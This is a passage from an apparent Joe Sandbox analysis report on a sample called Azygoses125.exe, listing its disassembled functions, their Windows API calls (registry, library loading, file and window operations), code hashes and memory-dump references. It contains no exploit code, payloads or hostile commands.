Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: f9407d004fa553bc8aea849b77edd3aa449c930f6ff429ba1ebd3d51c967f122
Instruction ID: 26eaddb35cdc13faf07641838d00295e4864c68e45bdd86d166378f51b3c2f7b
Opcode Fuzzy Hash: f9407d004fa553bc8aea849b77edd3aa449c930f6ff429ba1ebd3d51c967f122
Instruction Fuzzy Hash: 3201F431724210EBE7295B389D04B6A3698E710714F10897FF855F62F1D678CC028B5D

Function 0040231F Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040233E
RegCloseKey.ADVAPI32(00000000), ref: 00402347

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: e10cef08bc8bbd86e44cd2e6a93393b87c6fb5f379b9916ae68ae103a788fbbd
Instruction ID: 60bb5986470d48ad8cc55f7ac878df2b05d68ac6ea48f0c646ace7267bb4d846
Opcode Fuzzy Hash: e10cef08bc8bbd86e44cd2e6a93393b87c6fb5f379b9916ae68ae103a788fbbd
Instruction Fuzzy Hash: 88F04F32A04110ABEB11BFB59B4EABE72699B40314F15807BF501B71D5D9FC9902962D

Function 00406559 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,00403422,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040656B
GetProcAddress.KERNEL32(00000000,?), ref: 00406586

Part of subcall function 004064ED: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406504
Part of subcall function 004064ED: wsprintfW.USER32 ref: 0040653F
Part of subcall function 004064ED: LoadLibraryW.KERNELBASE(?), ref: 0040654F

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 8ec7921864f699fe8fbd142852d98d12a3a6d7db0e4c5c6745342fffa33e782c
Instruction ID: e4d993762fdbf4af8c35b1588ad4eaffa1172a51f023226dd59e00ceba6dfa89
Opcode Fuzzy Hash: 8ec7921864f699fe8fbd142852d98d12a3a6d7db0e4c5c6745342fffa33e782c
Instruction Fuzzy Hash: 12E086335042106BD2105B70AF4487773B89E94704306083EF546F2044D778DC329A6D

Function 00401DDC Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
EnableWindow.USER32(00000000,00000000), ref: 00401DFD

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 075d78e16e831d865290747b9eef420f676278b691cb94837bc861c0c9eb665c
Instruction ID: 2c738a9deecb2df013c07ba3b1cf6af0bd96662f3609e31d22ea84ca5a045a2b
Opcode Fuzzy Hash: 075d78e16e831d865290747b9eef420f676278b691cb94837bc861c0c9eb665c
Instruction Fuzzy Hash: 4FE08C326005009BCB20AFB5AB4999D3375DF50369710007BE442F10E1CABC9C408A2D

Function 00405D58 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\Azygoses125.exe,80000000,00000003), ref: 00405D5C
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D7E

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
Instruction ID: e98dd403a5e5432679a9d4e257ef455d3d6759c2e5ed6cf280caa05d5291d686
Opcode Fuzzy Hash: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
Instruction Fuzzy Hash: B3D09E71654601EFEF098F20DF16F2E7AA2EB84B00F11562CB682940E0DA7158199B19

Function 00405D33 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,00405938,?,?,00000000,00405B0E,?,?,?,?), ref: 00405D38
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D4C

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
Instruction ID: bbac5bc73aa77dea78574471440e90d8105817861fa72b5948562f5081259be0
Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
Instruction Fuzzy Hash: 1CD0C976504520ABC2112728AE0C89BBB55EB54371B028B35FAA9A22B0CB304C568A98

Function 0040582E Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,004033A9,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004035E2), ref: 00405834
GetLastError.KERNEL32 ref: 00405842

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
Instruction ID: 106bcc9dbfec6d9c4c73fbe0ebad0997e3226ea8ec62ae9f19e78208b048f617
Opcode Fuzzy Hash: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
Instruction Fuzzy Hash: C9C04C31204A019AD6606B209F09B177954EB50741F1184396946E00A0DB348425DE2D

Function 0040229D Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
Instruction ID: 9c0f32427e9d9ad9a827debec1b0d32512713181f08a0e22f3c826aa7fb996c6
Opcode Fuzzy Hash: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
Instruction Fuzzy Hash: 90E04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9

Function 00402CC9 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 6de8d722f9b5cde2e8321ff20ccbb9f3bd30598b393325d5ca99ac671e434b38
Instruction ID: 027cd1837f043f16bcd3791d2c18ee9a5769249626570c171517a7e702d59ee3
Opcode Fuzzy Hash: 6de8d722f9b5cde2e8321ff20ccbb9f3bd30598b393325d5ca99ac671e434b38
Instruction Fuzzy Hash: 17E0EC76254108BFDB10EFA9EE4BFE97BECAB44704F008435BA09E70E1C674E5509B69

Function 00404293 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004042A5

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5756958af50dd38891c3069a2751d27f69ae340bed3483b9d05a16c22411fa1f
Instruction ID: 2f2862f802f4bb8c259b254183006bf3f0de574643f6f04ef9dece27a841d158
Opcode Fuzzy Hash: 5756958af50dd38891c3069a2751d27f69ae340bed3483b9d05a16c22411fa1f
Instruction Fuzzy Hash: 24C04C71740600BBDA208B509E45F1677546754740F1448697740A50E0C674E410D62D

Function 0040336E Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040306C,?), ref: 0040337C

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D

Function 0040427C Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004040A8), ref: 0040428A

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4fda07dd220d348ff9e627888b9912082cf8e79b7c773bcb1828ccca34d8a7b3
Instruction ID: 7863800e542b6cbc8ec812c2a21dbba0b6cde8a84852b126545aa60b8f7f929b
Opcode Fuzzy Hash: 4fda07dd220d348ff9e627888b9912082cf8e79b7c773bcb1828ccca34d8a7b3
Instruction Fuzzy Hash: 13B01235285A00FBDE214B00EE09F457E62F76CB01F008478B340240F0CAB300B1DF19

Function 00404269 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00404041), ref: 00404273

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: c0b3a243f11644889afe8cb27eda9c0353b0d621d2840f40823c674b46be75ab
Instruction ID: 08295bde0fd8e02eb16c20732bdcb1eb6333efd9321479dd2e2322931d05c33c
Opcode Fuzzy Hash: c0b3a243f11644889afe8cb27eda9c0353b0d621d2840f40823c674b46be75ab
Instruction Fuzzy Hash: ADA001B6644500ABCE129F90EF49D0ABB72EBE4B02B518579A285900348A365961FB59

Non-executed Functions

Function 00404C5E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404C76
GetDlgItem.USER32(?,00000408), ref: 00404C81
GlobalAlloc.KERNEL32(00000040,?), ref: 00404CCB
LoadBitmapW.USER32(0000006E), ref: 00404CDE
SetWindowLongW.USER32(?,000000FC,00405256), ref: 00404CF7
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D0B
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D1D
SendMessageW.USER32(?,00001109,00000002), ref: 00404D33
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D3F
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D51
DeleteObject.GDI32(00000000), ref: 00404D54
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D7F
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D8B
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E21
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E4C
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E60
GetWindowLongW.USER32(?,000000F0), ref: 00404E8F
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E9D
ShowWindow.USER32(?,00000005), ref: 00404EAE
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FAB
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405010
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405025
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405049
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405069
ImageList_Destroy.COMCTL32(?), ref: 0040507E
GlobalFree.KERNEL32(?), ref: 0040508E
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405107
SendMessageW.USER32(?,00001102,?,?), ref: 004051B0
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051BF
InvalidateRect.USER32(?,00000000,00000001), ref: 004051DF
ShowWindow.USER32(?,00000000), ref: 0040522D
GetDlgItem.USER32(?,000003FE), ref: 00405238
ShowWindow.USER32(00000000), ref: 0040523F

Strings

M, xrefs: 00404E08
N, xrefs: 00404EE9
, xrefs: 00405217

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
